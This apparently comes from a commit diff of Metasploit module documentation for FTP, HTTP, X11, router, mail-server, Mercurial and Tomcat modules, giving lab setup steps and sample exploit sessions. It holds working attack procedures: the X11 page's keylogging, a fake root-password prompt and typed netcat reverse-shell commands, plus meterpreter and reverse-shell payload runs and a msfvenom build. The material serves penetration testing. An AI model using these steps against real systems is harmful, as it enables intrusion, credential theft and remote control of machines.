4. Select FTP Service. (Note: To support ASP.NET Membership or IIS Manager authentication for the FTP service, you will also need to select FTP Extensibility.)
5. Click OK.
#### Enabling anonymous login on IIS
1. Open IIS Manager and navigate to the level you want to manage. ...
2. In Features View, double-click Authentication.
3. On the Authentication page, select Anonymous Authentication.
4. In the Actions pane, click Enable to use Anonymous authentication with the default settings.
## Verification Steps
1. Do: ```use auxiliary/scanner/ftp/anonymous```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [IP]```
4. Do: ```run```
## Sample Output
### On vsFTPd 3.0.3 on Kali
```
msf > use auxiliary/scanner/ftp/anonymous
msf auxiliary(anonymous) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf auxiliary(anonymous) > set RPORT 21
RPORT => 21
msf auxiliary(anonymous) > exploit
[+] 127.0.0.1:21 - 127.0.0.1:21 - Anonymous READ (220 (vsFTPd 3.0.3))
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(anonymous) >
```
## Confirming using NMAP
```
root@kali:~# nmap -sV -sC 127.0.0.1 -p 21
Starting Nmap 7.40SVN ( https://nmap.org ) at 2017-04-24 22:58 IST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000035s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
Service Info: OS: Unix
root@kali:~#
```


@ -0,0 +1,62 @@
## Description
This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.
## Vulnerable Application
### Install ftp server on Kali Linux:
1. ```apt-get install vsftpd```
2. Allow local users to log in and to allow ftp uploads by editing file `/etc/vsftpd.conf` uncommenting the following:
```
local_enable=YES
write_enable=YES
chroot_list_enable=YES
chroot_list_file=/etc/vsftpd.chroot_list
```
3. Create the file `/etc/vsftpd.chroot_list` and add the local users you want allow to connect to FTP server. Start service and test connections:
4. ```service vsftpd start```
### Installing FTP for IIS 7.5 in Windows:
#### IIS 7.5 for Windows Server 2008 R2:
1. On the taskbar, click Start, point to Administrative Tools, and then click Server Manager.
2. In the Server Manager hierarchy pane, expand Roles, and then click Web Server (IIS).
3. In the Web Server (IIS) pane, scroll to the Role Services section, and then click Add Role Services.
4. On the Select Role Services page of the Add Role Services Wizard, expand FTP Server.
5. Select FTP Service. (Note: To support ASP.NET Membership or IIS Manager authentication for the FTP service, you will also need to select FTP Extensibility.)
6. Click Next.
7. On the Confirm Installation Selections page, click Install.
8. On the Results page, click Close.
#### IIS 7.5 for Windows 7:
1. On the taskbar, click Start, and then click Control Panel.
2. In Control Panel, click Programs and Features, and then click Turn Windows Features on or off.
3. Expand Internet Information Services, then FTP Server.
4. Select FTP Service. (Note: To support ASP.NET Membership or IIS Manager authentication for the FTP service, you will also need to select FTP Extensibility.)
5. Click OK.
## Verification Steps
1. Do: ```use auxiliary/scanner/ftp/ftp_login```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [IP]```
4. Do: ```run```
## Sample Output
```
msf> use auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > set RHOSTS ftp.openbsd.org
msf auxiliary(ftp_login) > set USERNAME ftp
msf auxiliary(ftp_login) > set PASSWORD hello@metasploit.com
msf auxiliary(ftp_login) > run
[*] 129.128.5.191:21 - Starting FTP login sweep
[+] 129.128.5.191:21 - LOGIN SUCCESSFUL: ftp:hello@metasploit.com
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ftp_login) >
```


@ -0,0 +1,80 @@
## Description
This module allows us to scan through a series of IP Addresses and provide details about the version of ftp running on that address.
## Vulnerable Application
### Install ftp server on Kali Linux:
1. ```apt-get install vsftpd```
2. Allow local users to log in and to allow ftp uploads by editing file `/etc/vsftpd.conf` uncommenting the following:
```
local_enable=YES
write_enable=YES
chroot_list_enable=YES
chroot_list_file=/etc/vsftpd.chroot_list
```
3. Create the file `/etc/vsftpd.chroot_list` and add the local users you want allow to connect to FTP server. Start service and test connections:
4. ```service vsftpd start```
### Installing FTP for IIS 7.5 in Windows:
#### IIS 7.5 for Windows Server 2008 R2:
1. On the taskbar, click Start, point to Administrative Tools, and then click Server Manager.
2. In the Server Manager hierarchy pane, expand Roles, and then click Web Server (IIS).
3. In the Web Server (IIS) pane, scroll to the Role Services section, and then click Add Role Services.
4. On the Select Role Services page of the Add Role Services Wizard, expand FTP Server.
5. Select FTP Service. (Note: To support ASP.NET Membership or IIS Manager authentication for the FTP service, you will also need to select FTP Extensibility.)
6. Click Next.
7. On the Confirm Installation Selections page, click Install.
8. On the Results page, click Close.
#### IIS 7.5 for Windows 7:
1. On the taskbar, click Start, and then click Control Panel.
2. In Control Panel, click Programs and Features, and then click Turn Windows Features on or off.
3. Expand Internet Information Services, then FTP Server.
4. Select FTP Service. (Note: To support ASP.NET Membership or IIS Manager authentication for the FTP service, you will also need to select FTP Extensibility.)
5. Click OK.
## Verification Steps
1. Do: ```use auxiliary/scanner/ftp/ftp_version```
2. Do: ```set RHOSTS [IP]```
3. Do: ```set RPORT [IP]```
4. Do: ```run```
## Sample Output
### On vsFTPd 3.0.3 on Kali
```
msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(ftp_version) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf auxiliary(ftp_version) > set RPORT 21
RPORT => 21
msf auxiliary(ftp_version) > exploit
[*] 127.0.0.1:21 - FTP Banner: '220 (vsFTPd 3.0.3)\x0d\x0a'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ftp_version) >
```
## Confirming using NMAP
```
root@kali:~# nmap -sV 127.0.0.1 -p21
Starting Nmap 7.40SVN ( https://nmap.org ) at 2017-04-24 23:11 IST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000035s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
Service Info: OS: Unix
root@kali:~#
```


@ -0,0 +1,102 @@
## Description
This module is a http crawler, it will browse the links recursively from the
web site. If you have loaded a database plugin and connected to a database,
this module will report web pages and web forms.
## Vulnerable Application
You can use any web application to test the crawler.
## Options
**URI**
Default path is `/`
**DirBust**
Bruteforce common url path, default is `true` but may generate noise in reports.
**HttpPassword**, **HttpUsername**, **HTTPAdditionalHeaders**, **HTTPCookie**
You can add some login information
**UserAgent**
Default User Agent is `Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)`
## Verification Steps
1. Do: ```use auxiliary/scanner/http/crawler```
2. Do: ```set RHOST [IP]```
3. Do: ```set RPORT [PORT]```
4. Do: ```set URI [PATH]```
4. Do: ```run```
## Sample Output
### Example against [WebGoat](https://github.com/WebGoat/WebGoat)
```
msf> use auxiliary/scanner/http/crawler
msf auxiliary(crawler) > set RHOST 127.0.0.1
msf auxiliary(crawler) > set RPORT 8080
msf auxiliary(crawler) > set URI /webgoat/
msf auxiliary(crawler) > set DirBust false
msf auxiliary(crawler) > run
[*] Crawling http://127.0.0.1:8008/webgoat/...
[*] [00001/00500] 302 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/ -> /webgoat/login.mvc
[*] [00002/00500] 200 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/login.mvc
[*] FORM: POST /webgoat/j_spring_security_check;jsessionid=8B1EAF2554B60EFC93A52AFCA4B6C202
[-] [00003/00500] 404 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/images/favicon.ico
[*] [00004/00500] 200 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/plugins/bootstrap/css/bootstrap.min.css
[*] [00005/00500] 200 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/css/font-awesome.min.css
[*] [00006/00500] 200 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/css/animate.css
[*] [00007/00500] 302 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/j_spring_security_check;jsessionid=8B1EAF2554B60EFC93A52AFCA4B6C202 -> /webgoat/login.mvc;jsessionid=8B1EAF2554B60EFC93A52AFCA4B6C202?error
[*] [00008/00500] 200 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/login.mvc;jsessionid=8B1EAF2554B60EFC93A52AFCA4B6C202?error
[*] FORM: GET /webgoat/login.mvc
[*] FORM: POST /webgoat/j_spring_security_check;jsessionid=8B1EAF2554B60EFC93A52AFCA4B6C202
[*] [00009/00500] 200 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/css/main.css
[*] [00010/00500] 302 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/start.mvc -> http://127.0.0.1:8008/webgoat/login.mvc
[*] [00011/00500] 200 - 127.0.0.1 - http://127.0.0.1:8008/webgoat/login.mvc
[*] FORM: POST /webgoat/j_spring_security_check
[*] Crawl of http://127.0.0.1:8008/webgoat/ complete
[*] Auxiliary module execution completed
```
## Follow-on: Wmap
As you see, the result is not very user friendly...
But you can view a tree of your website with the Wmap plugin. Simply run :
```
msf auxiliary(crawler) > load wmap
msf auxiliary(crawler) > wmap_sites -l
[*] Available sites
===============
Id Host Vhost Port Proto # Pages # Forms
-- ---- ----- ---- ----- ------- -------
0 127.0.0.1 127.0.0.1 8080 http 70 80
msf auxiliary(crawler) > wmap_sites -s 0
[127.0.0.1] (127.0.0.1)
└── webgoat (7)
├── css (3)
│ ├── animate.css
│ ├── font-awesome.min.css
│ └── main.css
├── j_spring_security_check;jsessionid=8B1EAF2554B60EFC93A52AFCA4B6C202
├── login.mvc
├── login.mvc;jsessionid=8B1EAF2554B60EFC93A52AFCA4B6C202
├── plugins (1)
│ └── bootstrap (1)
│ └── css (1)
│ └── bootstrap.min.css
├── start.mvc
└── j_spring_security_check
```


@ -0,0 +1,36 @@
## Vulnerable Application
This module exploits vulnerable versions of the Intel Management Engine (ME) firmware present Intel Core CPU 1st through 7th generations that allows authentication bypass and full control over the target machine, if the Active Management Technology feature is enabled and networking is configured.
**Vulnerable Application Installation Steps**
Enable the feature in the firmware setup screen on any vulnerable target machine. The module has been tested on HP and Lenovo desktops and laptops.
## Verification Steps
A successful run of the module will look like this:
```
msf auxiliary(telnet_version) > use auxiliary/scanner/http/intel_amt_digest_bypass
msf auxiliary(intel_amt_digest_bypass) > show options
Module options (auxiliary/scanner/http/intel_amt_digest_bypass):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target address range or CIDR identifier
RPORT 16992 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
THREADS 1 yes The number of concurrent threads
VHOST no HTTP server virtual host
msf auxiliary(intel_amt_digest_bypass) > set rhosts 192.168.1.18
rhosts => 192.168.1.18
msf auxiliary(intel_amt_digest_bypass) > run
[+] 192.168.1.18:16992 - Vulnerable to CVE-2017-5869 {"Computer model"=>"30A70051US", "Manufacturer"=>"LENOVO", "Version"=>"A4KT80AUS", "Serial number"=>" ", "System ID"=>"XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX", "Product name"=>"To be filled by O.E.M.", "Asset tag"=>" ", "Replaceable?"=>"Yes", "Vendor"=>"LENOVO", "Release date"=>"09/23/2015"}
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```


@ -0,0 +1,52 @@
## Description
This module will detect `robots.txt` files on web servers and analyze its content.
The `robots.txt` file is a file which is supposed to be honored by web crawlers
and bots, as locations which are not to be indexed or specifically called out
to be indexed. This can be abused to reveal interesting information about areas
of the site which an admin may not want to be public knowledge.
## Vulnerable Application
You can use almost any web application to test this module, as `robots.txt`
is extremely common.
## Verification Steps
1. Do: `use auxiliary/scanner/http/robots_txt`
2. Do: `set rhosts [ip]`
3. Do: `run`
4. You should get the `robots.txt` file content
## Options
**PATH**
You can set the test path where the scanner will try to find `robots.txt` file.
Default is `/`
## Sample Output
```
msf> use auxiliary/scanner/http/robots_txt
msf auxiliary(robots_txt) > set RHOSTS 172.217.19.238
msf auxiliary(robots_txt) > run
[*] [172.217.19.238] /robots.txt found
[+] Contents of Robots.txt:
User-agent: *
Disallow: /search
Allow: /search/about
Disallow: /sdch
Disallow: /groups
Disallow: /index.html?
Disallow: /?
```
[...Truncated...]
```
User-agent: facebookexternalhit
Allow: /imgres
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```


@ -0,0 +1,198 @@
## Vulnerable Application
X11 (X Window System) is a graphical windowing system most common on unix/linux, although implementations may be found in windows
with software such as Hummingbird Exceed X Server. The service can accept connections from any users when misconfigured
which is done with the command `xhost +`.
### Ubuntu 10.04
1. `sudo nano /etc/gdm/gdm.schemas`
2. Find:
```
<schema>
<key>security/DisallowTCP</key>
<signature>b</signature>
<default>true</default>
</schema>
```
- Change `true` to `false`
3. logout or reboot
4. Verification: ```sudo netstat -antp | grep 6000```
```
tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 1806/X
```
5. Now, to verify you allow ANYONE to get on X11, type: `xhost +`
### Ubuntu 12.04, 14.04
1. `sudo nano /etc/lightdm/lightdm.conf`
2. Under the `[SeatDefaults]` area, add:
```
xserver-allow-tcp=true
allow-guest=true
```
3. logout or reboot
4. Verification: ```sudo netstat -antp | grep 6000```
```
tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 1806/X
```
5. Now, to verify you allow ANYONE to get on X11, type: `xhost +`
### Ubuntu 16.04
Use the Ubuntu 12.04 instructions, however change `SeatDefaults` to `Seat:*`
### Fedora 15
1. `vi /etc/gdm/custom.conf`
2. Under the `[security]` area, add:
```
DisallowTCP=false
```
3. logout/reboot
4. Now, to verify you allow ANYONE to get on X11, type: `xhost +`
### Solaris 10
1. `svccfg -s svc:/application/x11/x11-server setprop options/tcp_listen = true`
2. `svc disable cde-login`
3. `svc enable cde-login`
4. `xhost +`
## Verification Steps
1. Install and configure X11
2. Start msfconsole
3. Do: `use auxiliary/scanner/x11/open_x11`
4. Do: `set rhosts [IPs]`
5. Do: `run`
## Scenarios
A run against Ubuntu 14.04 (192.168.2.75), Ubuntu 16.04 (192.168.2.26), and Solaris 10 (192.168.2.32)
```
msf > use auxiliary/scanner/x11/open_x11
msf auxiliary(open_x11) > set rhosts 192.168.2.75 192.168.2.26
rhosts => 192.168.2.75 192.168.2.26
msf auxiliary(open_x11) > run
[+] 192.168.2.75:6000 - 192.168.2.75 Open X Server (The X.Org Foundation)
[*] Scanned 1 of 3 hosts (33% complete)
[+] 192.168.2.26:6000 - 192.168.2.26 Open X Server (The X.Org Foundation)
[*] Scanned 2 of 3 hosts (66% complete)
[+] 192.168.2.32:6000 - 192.168.2.32 Open X Server (Sun Microsystems, Inc.)
[*] Auxiliary module execution completed
```
## Confirming
The following are other industry tools which can also be used.
### [nmap](https://nmap.org/nsedoc/scripts/x11-access.html)
```
# nmap -p 6000 --script=x11-access 192.168.2.26,75
Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-23 13:15 EDT
Nmap scan report for ubuntu-desktop-16 (192.168.2.26)
Host is up (0.0021s latency).
PORT STATE SERVICE
6000/tcp open X11
|_x11-access: X server access is granted
MAC Address: 00:0C:29:60:27:F9 (VMware)
Nmap scan report for ubuntu-desktop-14 (192.168.2.75)
Host is up (0.0021s latency).
PORT STATE SERVICE
6000/tcp open X11
|_x11-access: X server access is granted
MAC Address: 00:0C:29:0E:C4:6E (VMware)
```
### xdpyinfo
This is one of the standard linux tools to get info on an X display.
```
# xdpyinfo -display 192.168.2.75:0 | head -n 5
name of display: 192.168.2.75:0
version number: 11.0
vendor string: The X.Org Foundation
vendor release number: 11803000
X.Org version: 1.18.3
```
## Exploitation
Exploiting this mis-configuration has several methods. The target can have their display viewed, keystrokes logged, and potential keyboard typed.
### Keylogging
To keylog the remote host, we use a tool called [xspy](http://tools.kali.org/sniffingspoofing/xspy)
`xspy -display [ip]:0`
### Screen Monitoring
#### Entire Display
It is possible to monitor the entire display (all windows) and view the content.
- Take a screenshot: `xwd -root -display [ip]:[display] -out xdump.xdump`
- View screenshot: `display xdump.xdump` or `xwud -in xdump.xdump`
#### Specific Window
To monitor only a single window (a terminal for instance)
First, we need to determine which windows are available and what their processes are:
- `xwininfo -tree -root -display [ip]:0`
Once you determine which window you want to monitor, you'll want to use the `windowID`. Now use the application `xwatchwin`
- `xwatchwin [ip]:0 -w [windowID]`
### Social Engineering
Obviously watching keystrokes is good, but we want to coax the user into providing their password. We can do this by using xterm to display a login box to the user.
This was tested against Ubuntu 12.04, 14.04, 16.04 and Solaris 10.
1. start `xspy`
2. `xterm -T "Root Permission Required" -display [ip]:0 -e "echo -e -n 'root password: '; read passwd; echo 'Authentication Failure'; echo -e -n 'root password: '; read passwd"`
- Notice it asks twice for the password incase of a mistyped initial password. This can also be adjusted to just say password or the real user's username
- The victim's typed text by the user will not be masked (`*`)
### Direct Exploitation
Use `exploits/unix/x11/x11_keyboard_exec`
### Typing Commands
Similar to the method `exploits/unix/x11/x11_keyboard_exec` uses, its possible to use `xdotool` to run commands on the remote system.
To install `xdotool` on kali simply run `apt-get install xdotool`
Now, you can directly interact by typing commands (which appear on the users screen), an example would be running xterm and launching netcat.
For this scenario we run a simple reverse netcat to 192.168.2.9:80
```
xdotool key alt+F2
xdotool key x t e r m
xdotool key KP_Enter
xdotool key n c space 1 9 2 period 1 6 8 period 2 period 9 space 8 0 space minus e space slash b i n slash b a s h KP_Enter
```

View File

@ -38,7 +38,7 @@ that through command injection to gain Meterpreter root access.
With an attacker node that resides within the ISP network, do:
- Set `payload` to `linux/mipsbe/mettle_reverse_tcp`
- Set `payload` to `linux/mipsbe/meterpreter_reverse_tcp`
- Set `RHOST` to the target router's IP
@ -73,7 +73,7 @@ module's own HTTP server and host it externally. To do so, first generate
the payload ELF executable using `msfvenom`:
```
$ msfvenom --format elf --arch mipsbe --platform linux --payload linux/mipsbe/mettle/reverse_tcp --out payload.elf LHOST='41.34.32.121' LPORT=4444
$ msfvenom --format elf --arch mipsbe --platform linux --payload linux/mipsbe/meterpreter/reverse_tcp --out payload.elf LHOST='41.34.32.121' LPORT=4444
No encoder or badchars specified, outputting raw payload
Payload size: 212 bytes


@ -17,17 +17,17 @@ Netgear R7000 and R6400 routers running firmware version `1.0.7.2_1.1.93` and po
## Options
**PAYLOAD**
The valid payloads are `mettle` payloads _only_. The payload uses the `wget` flavor and pipes the downloaded binary to `sh`
The valid payloads are `meterpreter` payloads _only_. The payload uses the `wget` flavor and pipes the downloaded binary to `sh`
## Scenarios
Sample output of a successful session:
```
msf exploit(netgear_r7000_cgibin_exec) > run
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Started reverse TCP handler on 127.0.0.1:4444
[*] Router is a NETGEAR router (R7000)
[+] Router may be vulnerable (NETGEAR R7000)
[*] Using URL: http://0.0.0.0:8080/
@ -35,16 +35,16 @@ Netgear R7000 and R6400 routers running firmware version `1.0.7.2_1.1.93` and po
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:54168) at 2017-03-10 15:56:21 -0600
[*] Server stopped.
meterpreter > getuid
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
meterpreter > sysinfo
Computer : 192.168.1.4
OS : (Linux 2.6.36.4brcmarm+)
Architecture : armv7l
Meterpreter : armle/linux
meterpreter >
meterpreter >
```
As you can see, the `uid` is 0, meaning you have root access.


@ -0,0 +1,53 @@
## Vulnerable Application
This module exploits a command injection vulnerability in the [wePresent WiPG-1000](http://wepresentwifi.com/wipg1000.html) device. A description of the exploited vulnerability is available in section 3.4 of [this advisory](https://www.redguard.ch/advisories/wepresent-wipg1000.txt).
The latest vulnerable firmware version is 2.0.0.7. Newer versions can be downgraded to [the older firmware](http://www.wepresentwifi.com/assets/downloads/wipg1000/wePresent.1000.2.0.0.7.nad.zip).
There is no complete list of vulnerable firmware versions, however the check method can reliably detect whether a device is vulnerable. The check method checks for the presence of the `rdfs.cgi` file and whether it contains the string `https://www.redguard.ch/advisories/wepresent-wipg1000.txt`. All known versions of this file on the device are vulnerable to this command injection.
Manual exploitation would equate to browsing to the URI `http://<ip>/cgi-bin/rdfs.cgi` and entering the String `; command;` in the input field and submitting the form.
Version 2.0.0.7 was confirmed vulnerable, and firmware 2.2.3.0 was released to fix the exploit.
## Verification Steps
1. Make sure the device is running.
2. Start msfconsole.
3. Do: ```use exploit/linux/http/wipg1000_cmd_injection```
4. Do: ```set payload cmd/unix/reverse_netcat```
5. Do: ```set RHOST <ip>```
6. Do: ```set LHOST <ip>```
7. Do: ```exploit```
8. You should get a shell.
## Options
**PAYLOAD**
The `generic`,`netcat` and `openssl` payload types are valid.
## Scenarios
### Firmware 2.0.0.7
The following is an example run getting a shell:
```
msf > use exploit/linux/http/wipg1000_cmd_injection
msf exploit(wipg1000_cmd_injection) > set payload cmd/unix/reverse_netcat
payload => cmd/unix/reverse_netcat
msf exploit(wipg1000_cmd_injection) > set RHOST 192.168.3.3
RHOST => 192.168.3.3
msf exploit(wipg1000_cmd_injection) > set LHOST 192.168.3.216
LHOST => 192.168.3.216
msf exploit(wipg1000_cmd_injection) > check
[*] 192.168.3.3:80 The target appears to be vulnerable.
msf exploit(wipg1000_cmd_injection) > exploit
[*] Started reverse TCP handler on 192.168.3.216:4444
[*] Sending request
[*] Command shell session 1 opened (192.168.3.216:4444 -> 192.168.3.3:50893) at 2017-04-20 16:11:48 +0200
id
uid=0(root) gid=0(root) groups=0(root),10(wheel)
```


@ -0,0 +1,81 @@
## Vulnerable Application
Setup the vulnerable Haraka install by running this script on Ubuntu, Debian or similar:
```
#install nodejs and npm
curl -sL https://deb.nodesource.com/setup_7.x | sudo -E bash -
sudo apt install nodejs
#Haraka setup
wget https://github.com/haraka/Haraka/archive/v2.8.8.tar.gz
tar xvzf v2.8.8.tar.gz
cd Haraka-2.8.8/
npm install npm
npm install
haraka -i haraka
cat << EOF > haraka/config/plugins
access
rcpt_to.in_host_list
data.headers
attachment
test_queue
max_unrecognized_commands
EOF
echo haraka.test >> haraka/config/host_list
# Launch haraka as root
sudo haraka -c haraka
```
## Options
**from_email**
String used in the SMTP MAILFROM command
**to_email**
String used in the SMTP MAILTO command
**lhost**
The address to serve the payload from
**rhost**
The address or hostname to target
**payload**
Any compatible Metasploit payload
## Example Run
```
msf > use exploit/linux/smtp/harakiri
msf exploit(haraka) > set email_to root@haraka.test
email_to => root@haraka.test
msf exploit(haraka) > set payload linux/x64/meterpreter_reverse_http
payload => linux/x64/meterpreter_reverse_http
msf exploit(haraka) > run
[*] Started HTTP reverse handler on http://192.168.1.1:8080
[*] Exploiting...
[*] Using URL: http://192.168.1.1:8080/36CacHfIIBnBe3
[*] Sending mail to target server...
[*] http://192.168.1.1:8080 handling request from 192.168.1.2; (UUID: xoljaxxi) Redirecting stageless connection from /UJgmNdAvcM7RkNeSiIMMwg_phj2ODD0I0sgpuoWRXMCMYpHwI0ydcMlb4vVjgylZF9yr-gOpQu9aOibLROCaSBoN0tLHJRGCK0B4ZKg1aQy8LPB with UA 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'
[*] http://192.168.1.1:8080 handling request from 192.168.1.2; (UUID: xoljaxxi) Attaching orphaned/stageless session...
[*] Meterpreter session 2 opened (192.168.1.1:8080 -> 192.168.1.2:42122) at 2017-05-10 22:41:06 -0500
[*] Command Stager progress - 100.00% done (120/120 bytes)
[*] Server stopped.
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.1.2 - Meterpreter session 2 closed. Reason: User exit
msf exploit(haraka) >
```


@ -0,0 +1,53 @@
## Vulnerable Application
[mercurial](https://www.mercurial-scm.org/downloads).
This module was successfully tested against:
- Kali Linux, HG 4.0 and a customized hg-ssh (to simulate custom hg-ssh wrappers which have weak repo validation)
## Vulnerable Server Setup Steps
1. Install mercurial on your test server
2. Patch the hg-ssh Python script script to emulate custom/weak repo validation in hg-ssh wrapper `vi $(which hg-ssh)`
- Replace `if repo in allowed paths:` with `if True:`
- Replace `cmd = ['-R', repo, 'serve', 'stdio']` with `cmd = ['-R', path, 'serve', 'stdio']`
3. Setup a user with SSH pubkey auth
4. Create a test repo in the users home directory and add a commit
- `mkdir -p repos/repo1`
- `cd repos/repo1`
- `echo "hello world" > README`
- `hg add README`
- `hg commit -m "Adds README"`
5. Restrict user in authorized_keys to hg-ssh binary only
- `command="hg-ssh ~/repos/repo1",no-port-forwarding,no-X11-forwarding,no-agent-forwarding INSERT_SSH_PUB_KEY`
6. Verify SSH user can authenticate (should prompt and prevent a shell)
- `ssh user@192.168.10.99`
7. Verify SSH user commands are not allows (should prevent arbitrary commands)
- `ssh user@192.168.10.99 ifconfig`
## Verification Steps
1. Start msfconsole
2. Do: `use exploit/linux/ssh/mercurial_ssh_exec`
3. Do: `set RHOST <ip>`
4. Do: `set LHOST <ip>`
5. Do: `set SSH_PRIV_KEY_FILE /Users/jsmith/.ssh/id_rsa`
6. Do: `exploit`
7. You should get a shell.
## Scenarios
### Kali Linux, HG 4.0 and a customized hg-ssh (to simulate custom hg-ssh wrappers which have weak repo validation)
```
msf exploit(mercurial_ssh_exec) > exploit
[*] Started reverse TCP handler on 192.168.10.37:4444
[*] 192.168.10.99:22 - 192.168.10.99:22 - Attempting to login...
[+] 192.168.10.99:22 - SSH connection is established.
[+] 192.168.10.99:22 - Triggered Debugger (entering debugger - type c to continue starting hg or h for help)
[*] Sending stage (39842 bytes) to 192.168.10.99
[*] Meterpreter session 1 opened (192.168.10.37:4444 -> 192.168.10.99:57606) at 2017-04-18 19:16:44 -0400
```


@ -32,7 +32,7 @@ For this exploitation, it was changed to simply `manager`.
3. Exploit:
```
msf > use exploit/multi/http/tomcat_mgr_deploy
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108
rhost => 192.168.2.108
msf exploit(tomcat_mgr_deploy) > set verbose true
@ -43,7 +43,7 @@ For this exploitation, it was changed to simply `manager`.
HttpUsername => tomcat
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
lhost => 192.168.2.117
msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set target 1
target => 1
@ -54,8 +54,8 @@ For this exploitation, it was changed to simply `manager`.
msf exploit(tomcat_mgr_deploy) > check
[*] 192.168.2.108:8086 The target appears to be vulnerable.
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using manually select target "Java Universal"
[*] Uploading 6071 bytes as scEYoK0.war ...
[!] No active DB -- Credential data will not be saved!
@ -63,12 +63,12 @@ For this exploitation, it was changed to simply `manager`.
[*] Undeploying scEYoK0 ...
[*] Sending stage (49409 bytes) to 192.168.2.108
[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.108:1663) at 2017-01-14 14:30:52 -0500
meterpreter > sysinfo
Computer : winxp
OS : Windows XP 5.1 (x86)
Meterpreter : java/windows
```
### Tomcat 7 (7.0.73)
@ -96,7 +96,7 @@ Of note, the user was given `manager-gui` permissions by default.
3. Exploitation:
```
msf > use exploit/multi/http/tomcat_mgr_deploy
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108
rhost => 192.168.2.108
msf exploit(tomcat_mgr_deploy) > set path /manager/text
@ -111,15 +111,15 @@ Of note, the user was given `manager-gui` permissions by default.
lhost => 192.168.2.117
msf exploit(tomcat_mgr_deploy) > set rport 8087
rport => 8087
msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set target 1
target => 1
msf exploit(tomcat_mgr_deploy) > check
[*] 192.168.2.108:8087 The target appears to be vulnerable.
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Using manually select target "Java Universal"
[*] Uploading 6086 bytes as Cl6t6gurtwIO59zV3Lt6.war ...
[!] No active DB -- Credential data will not be saved!
@ -127,7 +127,7 @@ Of note, the user was given `manager-gui` permissions by default.
[*] Undeploying Cl6t6gurtwIO59zV3Lt6 ...
[*] Sending stage (49409 bytes) to 192.168.2.108
[*] Meterpreter session 1 opened (192.168.2.117:4444 -> 192.168.2.108:1656) at 2017-01-14 14:27:21 -0500
meterpreter > sysinfo
Computer : winxp
OS : Windows XP 5.1 (x86)
@ -159,12 +159,12 @@ Of note, the user was given `manager-gui` permissions by default.
3. Exploitation:
```
msf > use exploit/multi/http/tomcat_mgr_deploy
msf > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.2.108
rhost => 192.168.2.108
msf exploit(tomcat_mgr_deploy) > set rport 8088
rport => 8088
msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(tomcat_mgr_deploy) > set lhost 192.168.2.117
lhost => 192.168.2.117
@ -178,15 +178,15 @@ Of note, the user was given `manager-gui` permissions by default.
msf exploit(tomcat_mgr_deploy) > set path /manager/text
path => /manager/text
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started reverse TCP handler on 192.168.2.117:4444
[*] Started reverse TCP handler on 192.168.2.117:4444
